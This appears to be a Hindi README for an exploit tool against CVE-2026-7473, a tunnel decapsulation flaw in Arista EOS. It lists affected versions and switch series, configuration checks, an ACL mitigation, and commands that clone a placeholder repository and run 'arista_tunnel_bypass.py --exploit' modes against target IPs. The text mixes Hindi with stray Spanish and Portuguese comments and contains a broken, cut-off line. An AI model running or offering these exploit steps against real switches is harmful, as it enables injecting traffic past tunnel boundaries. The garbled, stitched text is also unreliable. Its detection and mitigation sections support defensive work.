
भेद्यता: प्रभावित Arista EOS प्लेटफार्मों पर टनल डिकैप्सुलेशन के साथ
यह कोड केवल शैक्षिक उद्देश्यों और अधिकृत सुरक्षा परीक्षण के लिए है।
CVE-2026-7473 Arista EOS में एक कमजोरी है, जहां एक स्विच जो टनल एंडपॉइंट (VXLAN, GRE, decap-groups) के रूप में कॉन्फ़िगर किया गया है, अनपेक्षित टनल किए गए पैकेटों को गलत तरीके से डिकैप्सुलेट और अग्रेषित करता है, जिनका गंतव्य IP कॉन्फ़िगर किए गए डिकैप्सुलेशन IP से मेल खाता है। ऐसा इसलिए होता है क्योंकि स्विच टनल प्रोटोकॉल प्रकार की जांच नहीं करता (CWE-1023)।
| फ़ील्ड | मान |
|---|
| CVE | CVE-2026-7473 |
| CVSS v3.1 | 5.8 (Medium) |
| CVSS v4.0 | 6.8 |
| Vector | AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:N |
| CWE | 1023 - Incomplete Comparison with Missing Factors |
| ट्रेन | स्थिति |
|---|---|
| 4.36.x | कमजोर |
| 4.35.x | कमजोर |
| 4.34.x | कमजोर |
| 4.33.x | कमजोर |
| 4.32.x | कमजोर |
| 4.31.x | कमजोर |
| 4.30.x | कमजोर |
| < 4.30.x | कमजोर |
| सीरीज़ | एक्सपोज़र |
|---|---|
| 7020R Series | पूरी तरह प्रभावित |
| 7280R/R2 Series | पूरी तरह प्रभावित |
| 7500R/R2 Series | पूरी तरह प्रभावित |
| 7280R3 Series | सीमित एक्सपोज़र (IP-in-IPv6, GUEv6) |
| 7500R3 Series | सीमित एक्सपोज़र (IP-in-IPv6, GUEv6) |
| 7800R3 Series | सीमित एक्सपोज़र (IP-in-IPv6, GUEv6) |
डिवाइस कमजोर है यदि यह पूरा करता है:
ip decap-group हो# Verificar VXLAN VTEP
show interfaces vxlan 1
# Verificar GRE tunnel
show interfaces Tunnel0
# Verificar decap-groups
show ip decap-group
git clone https://github.com/username/CVE-2026-7473-Arista-EOS-Tunnel-Bypass
cd CVE-2026-7473-Arista-EOS-Tunnel-Bypass
pip install -r requirements.txt
python3 arista_tunnel_bypass.py -t 10.1.1.1 -d 192.168.1.100 --check-config
python3 arista_tunnel_bypass.py -t 10.1.1.1 -d 192.168.1.100 --exploit vxlan-gre
python3 arista_tunnel_bypass.py -t 10.1.1.1 -d 192.168.1.100 --exploit gre-vxlan
python3 arista_tunnel_bypass.py -t 10.1.1.1 -d 192.168.1.100 --exploit all
| कॉन्फ़िगरेशन | अप्रत्याशित ट्रैफ़िक | डिकैप्सुलेट करता है? |
|---|---|---|
| VXLAN IPv4 | GRE | ✅ हाँ |
| VXLAN IPv4 | IPoIP | ✅ हाँ |
| GRE IPv4 | VXLAN | ✅ हाँ |
| GRE IPv4 | IPoIP | ✅ हाँ |
| GRE Decap Group | IPoIP | ✅ हाँ |
| GUE Decap Group | GRE, IPoIP | ✅ हाँ |
| IP-in-IP Decap Group | GRE, NVGRE, VXLAN | ✅ हाँ |
# Verificar ACL counters
show mac access-lists bar
# Buscar tráfico inesperado
show log | grep -E "GRE|VXLAN|GUE|unexpected"
# Ejemplo: Permitir solo VXLAN
ip access-list foo
counters per-entry
1 permit udp any host <vxlan-decap-ip> eq 4789
2 deny ip any host <decap-ip>
3 permit ip any any
यह सॉफ़्टवेयर "जैसा है" प्रदान किया जाता है। लेखक दुरुपयोग के लिए ज़िम्मेदार नहीं है। इसका उपयोग केवल अधिकृत सिस्टम पर करें।